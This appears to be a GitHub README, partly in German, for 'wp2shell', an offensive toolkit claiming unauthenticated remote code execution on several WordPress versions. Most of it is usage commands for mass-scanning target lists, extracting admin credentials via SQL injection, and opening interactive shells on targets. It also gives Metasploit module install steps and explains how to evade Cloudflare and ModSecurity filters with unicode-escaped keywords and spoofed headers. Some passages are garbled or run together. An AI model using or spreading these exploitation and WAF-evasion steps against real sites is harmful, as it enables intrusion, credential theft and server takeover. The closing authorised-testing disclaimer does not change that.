
WordPress-Pre-Auth-RCE-Exploit + Scanner + WAF-Bypass | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit-Module + Docker-Lab
___ __ ___
_ _____ |__ \ ___/ /_ ___ / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / /
| |/ |/ / __// __//_ / / / / __/ / /
|__/|__/\___//____//__/_/ /_/\___/_/_/
WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
by Venexy (M4xSec)
Nicht authentifizierte Remote-Codeausführung auf WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. Behoben in 6.8.6, 6.9.5, 7.0.2.
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell
# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go
parse_request() fälscht einen Administratorgo-scanner/wp2shell-master.go)All-in-One-Binärdatei – Scan, Check, Read, Exploit, interaktive Shell.
go build -o wp2shell-master go-scanner/wp2shell-master.go
# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20
# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0
# Extract admin creds
./wp2shell-master read https://target.com --preset users
# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth
# Interactive shell
./wp2shell-master rce https://target.com -i -y
waf-bypass/)Eigenständige Skripte für den Cloudflare/ModSecurity-Bypass per JSON-Unicode-Escaping von SQL-Schlüsselwörtern.
core.py — Gemeinsame Engine für blinde SQLi mit WAF-Bypassdump_version.py — Extrahiert @@versiondump_dbname.py — Extrahiert DATABASE()dump_tables.py — Listet Tabellen aufdump_columns.py — Listet Spalten aufrce_shell.py — Vollständige RCE-Kette mit WAF-Bypassmetasploit-modules/)Lokal installieren:
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb
Die Cloudflare-WAF prüft rohe JSON-Bytes, dekodiert aber \uXXXX-Escape-Sequenzen vor dem Pattern-Matching nicht. WordPress' PHP json_decode() dekodiert sie transparent.
SLEEP → SLEEP — umgeht die Schlüsselwort-Erkennung: statt http://:) – kürzer, umgeht URI-Muster-Regeln/wp-json/batch/v1 Permalink-Pfad – vermeidet Blockierung über ?rest_route=Origin- und Referer-Header von der Zieldomäne – erfüllt CORS-/Same-Origin-Prüfungencd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!
ModSecurity CRS (OWASP) mit Cloudflare-artigen Regeln – Unicode-Bypass bestätigt.
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999
Dieses Tool dient ausschließlich autorisierten Sicherheitstests. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff ist illegal.
MIT